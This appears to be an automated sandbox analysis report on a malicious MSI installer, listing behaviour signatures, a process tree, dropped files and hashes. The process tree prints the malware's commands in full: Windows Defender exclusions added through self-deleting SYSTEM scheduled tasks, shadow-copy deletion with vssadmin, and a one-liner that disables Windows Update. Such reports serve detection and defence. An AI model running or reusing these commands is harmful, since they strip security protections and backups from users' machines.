Analysis

  • max time kernel
    140s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    29/07/2026, 02:50

General

  • Target
    Install_28n003.msi
  • Size 6.8MB
  • Sample260729-dbllgsshjf
  • SHA256 6594c9852681cded09d477d96e17b9363f08bd6a0671e92fbc52e300c89cde0c
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 5 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 6 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 13 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Install_28n003.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4896
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1416
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:436
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding F920D005B6C6993539E94E580AD6B9E5 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:1448
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4892
  • C:\Users\Public\Fi8F1F\Nfumt9.exe
    C:\Users\Public\Fi8F1F\Nfumt9.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\Fi8F1F\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1004
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\Fi8F1F\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1748
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4064
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:1688
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:3940
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3312
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:2528
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1672
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:5028
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4248
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:3924
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:760
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:928
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:516
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:716
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:3264
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3428
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1888
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:4720
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1660
                        • C:\Program Files (x86)\dE9tNa\dE9tNa.exe
                          "C:\Program Files (x86)\dE9tNa\dE9tNa.exe"
                          2⤵
                          • UAC bypass
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • System Location Discovery: System Language Discovery
                          • System policy modification
                          PID:4580
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            PID:4244
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\dE9tNa" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            PID:4600
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\dE9tNa" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              PID:4672
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:1448
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:4684
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:5020
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\dE9tNa\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            PID:5040
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            PID:2140
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:4512
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\dE9tNa" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            PID:2936
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\Fi8F1F" /t REG_DWORD /d 0 /f
                        1⤵
                        • Executes a command shell one-liner
                        • Suspicious use of WriteProcessMemory
                        PID:3040
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\Fi8F1F" /t REG_DWORD /d 0 /f
                          2⤵
                          • Windows security bypass
                          PID:536
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                        1⤵
                        • Executes a command shell one-liner
                        • Suspicious use of WriteProcessMemory
                        PID:3024
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                          2⤵
                          • Windows security bypass
                          PID:3060
                      • C:\Windows\system32\cmd.exe
                        cmd.exe
                        1⤵
                          PID:3800
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:1832
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:4364
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:4828
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:3516
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:3776
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:3384
                        • C:\Program Files (x86)\dE9tNa\dE9tNa.exe
                          "C:\Program Files (x86)\dE9tNa\dE9tNa.exe"
                          1⤵
                            PID:4208
                          • C:\Program Files (x86)\dE9tNa\dE9tNa.exe
                            "C:\Program Files (x86)\dE9tNa\dE9tNa.exe"
                            1⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:3624
                          • C:\Program Files (x86)\dG1l6X\2gbii9.exe
                            "C:\Program Files (x86)\dG1l6X\2gbii9.exe"
                            1⤵
                              PID:5060

                            Network

                                  MITRE ATT&CK Enterprise v16

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  e589518.rbs

                                  • Path C:\Config.Msi\e589518.rbs
                                  • Size 7KB
                                  • SHA256 ee282a521c484938fdd7f642890f44216b038bf63c6496b1bbb9dd3e322f0aa9
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  XPSPLOG.dll

                                  • Path C:\Program Files (x86)\dE9tNa\XPSPLOG.dll
                                  • Size 4.6MB
                                  • SHA256 c691f6176679de9f597688ab1e392c5da61e6f41e352cbd724e9c586aa3a3655
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  dE9tNa.exe

                                  • Path C:\Program Files (x86)\dE9tNa\dE9tNa.exe
                                  • Size 145KB
                                  • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  image.png

                                  • Path C:\Program Files (x86)\dE9tNa\image.png
                                  • Size 4.9MB
                                  • SHA256 e688961933acbc917948166b898aa20dbe390f7b2c656b7b095a258f4781b861
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  thumbs.db

                                  • Path C:\Program Files (x86)\dE9tNa\thumbs.db
                                  • Size 358KB
                                  • SHA256 aa6f3711214397b3cc75c3b23277b8cdfe1914651290a41b3c566a6de81fcf76
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  XPSPLOG.dll

                                  • Path C:\Program Files (x86)\dG1l6X\XPSPLOG.dll
                                  • Size 4.6MB
                                  • SHA256 7262b46a9787c4ad1266c1e02ba3d2e4d9a4777ba27477ef62e1c8a7e1da77db
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  image.png

                                  • Path C:\Program Files (x86)\dG1l6X\image.png
                                  • Size 4.9MB
                                  • SHA256 7cbc7c636b7ae34190779af431d3d60a618a8e090020c4862d325839160f746c
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  Nfumt9.exe

                                  • Path C:\Users\Public\Fi8F1F\Nfumt9.exe
                                  • Size 135KB
                                  • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  UxEnhance64.dll

                                  • Path C:\Users\Public\Fi8F1F\UxEnhance64.dll
                                  • Size 3.1MB
                                  • SHA256 6f54d99b2fb13f5aa340f98b71ccc047d7a933e83c5daa8a674ad1863ba56ac0
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  adoresd.dat

                                  • Path C:\Users\Public\Fi8F1F\adoresd.dat
                                  • Size 4.8MB
                                  • SHA256 37e70a22482e543b44f3b1b5ba101665ee7a2c8a993c2530311fa82333d03e49
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  msadox.tb

                                  • Path C:\Users\Public\Fi8F1F\msadox.tb
                                  • Size 8KB
                                  • SHA256 7ccf86c6a81dd086a9cdcb7b66f8bbf9c8be97bbf70128494d1672a4ca0b6706
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  destopbak.ini

                                  • Path C:\Users\Public\Music\destopbak.ini
                                  • Size 2B
                                  • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                  • MD5 SHA1 SHA512

                                  MSI96ED.tmp

                                  • Path C:\Windows\Installer\MSI96ED.tmp
                                  • Size 6.8MB
                                  • SHA256 1ab218a9ec2d006758a08ca895b650226b53d12fc4a17bae80a9d39645c00d9d
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  e589517.msi

                                  • Path C:\Windows\Installer\e589517.msi
                                  • Size 6.8MB
                                  • SHA256 6594c9852681cded09d477d96e17b9363f08bd6a0671e92fbc52e300c89cde0c
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  metadata-2

                                  • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                  • Size 24.1MB
                                  • SHA256 aa948cfa60f2b46eed5e46732d84d4fdfd8722cbc125a6a88315bbd3ef9fca10
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  {b3ce4c17-93b3-4985-aa89-9babfdc7adad}_OnDiskSnapshotProp

                                  • Path \??\Volume{d78106ee-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{b3ce4c17-93b3-4985-aa89-9babfdc7adad}_OnDiskSnapshotProp
                                  • Size 6KB
                                  • SHA256 20e8eba6ac2954044afc7661c7b4e8fb09d22a48e5e1392522176a4715c31cd6
                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                  xxxx.ini

                                  • Path \??\c:\xxxx.ini
                                  • Size 2B
                                  • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                  • MD5 SHA1 SHA512

                                  memory/1448-44-0x00007FF91CAF0000-0x00007FF91CB00000-memory.dmp

                                  memory/1448-16-0x00007FF91CAF0000-0x00007FF91CB00000-memory.dmp

                                  memory/1448-12-0x00007FF925CF0000-0x00007FF925CF2000-memory.dmp

                                  memory/1448-13-0x00007FF9074F0000-0x00007FF907B34000-memory.dmp

                                  memory/2212-59-0x00007FF906660000-0x00007FF906B7E000-memory.dmp

                                  memory/2212-73-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/2212-87-0x000001CD6C000000-0x000001CD6C08A000-memory.dmp

                                  memory/2212-86-0x000001CD6C000000-0x000001CD6C08A000-memory.dmp

                                  memory/2212-85-0x000001CD6C000000-0x000001CD6C08A000-memory.dmp

                                  memory/2212-84-0x000001CD6C000000-0x000001CD6C08A000-memory.dmp

                                  memory/2212-83-0x000001CD6BEE0000-0x000001CD6BF2E000-memory.dmp

                                  memory/2212-92-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/2212-93-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/2212-72-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/2212-74-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/2212-78-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/2212-71-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/2212-66-0x00007FF925D00000-0x00007FF925D02000-memory.dmp

                                  memory/2212-58-0x00007FF925CF0000-0x00007FF925CF2000-memory.dmp

                                  memory/2212-64-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/2212-67-0x000001CD6B2E0000-0x000001CD6BB9E000-memory.dmp

                                  memory/3624-249-0x0000000002E10000-0x00000000035F9000-memory.dmp

                                  memory/3624-248-0x0000000000990000-0x0000000000991000-memory.dmp

                                  memory/3624-254-0x0000000000970000-0x0000000000971000-memory.dmp

                                  memory/3624-229-0x0000000002E10000-0x00000000035F9000-memory.dmp

                                  memory/3624-225-0x0000000000970000-0x0000000000971000-memory.dmp

                                  memory/3624-226-0x0000000075430000-0x0000000075B7A000-memory.dmp

                                  memory/4208-232-0x0000000075430000-0x0000000075B7A000-memory.dmp

                                  memory/4208-235-0x0000000003340000-0x0000000003B29000-memory.dmp

                                  memory/4208-231-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

                                  memory/4208-260-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

                                  memory/4208-257-0x0000000003340000-0x0000000003B29000-memory.dmp

                                  memory/4208-256-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

                                  memory/4580-177-0x0000000075430000-0x0000000075B7A000-memory.dmp

                                  memory/4580-209-0x00000000031C0000-0x00000000039A9000-memory.dmp

                                  memory/4580-183-0x0000000000DB0000-0x0000000000DB1000-memory.dmp

                                  memory/4580-176-0x0000000000C50000-0x0000000000C51000-memory.dmp

                                  memory/4580-181-0x00000000031C0000-0x00000000039A9000-memory.dmp

                                  memory/4580-188-0x00000000031C0000-0x00000000039A9000-memory.dmp

                                  memory/4580-267-0x00000000031C0000-0x00000000039A9000-memory.dmp

                                  memory/4580-185-0x00000000031C0000-0x00000000039A9000-memory.dmp

                                  memory/4580-222-0x0000000010000000-0x0000000010061000-memory.dmp

                                  memory/4580-195-0x0000000003AB0000-0x0000000003AC4000-memory.dmp

                                  memory/5060-243-0x00000000015F0000-0x00000000015F1000-memory.dmp

                                  memory/5060-265-0x00000000015F0000-0x00000000015F1000-memory.dmp

                                  memory/5060-261-0x0000000001610000-0x0000000001611000-memory.dmp

                                  memory/5060-263-0x0000000003910000-0x00000000040F9000-memory.dmp

                                  memory/5060-244-0x0000000074560000-0x0000000074CAA000-memory.dmp

                                  memory/5060-252-0x0000000003910000-0x00000000040F9000-memory.dmp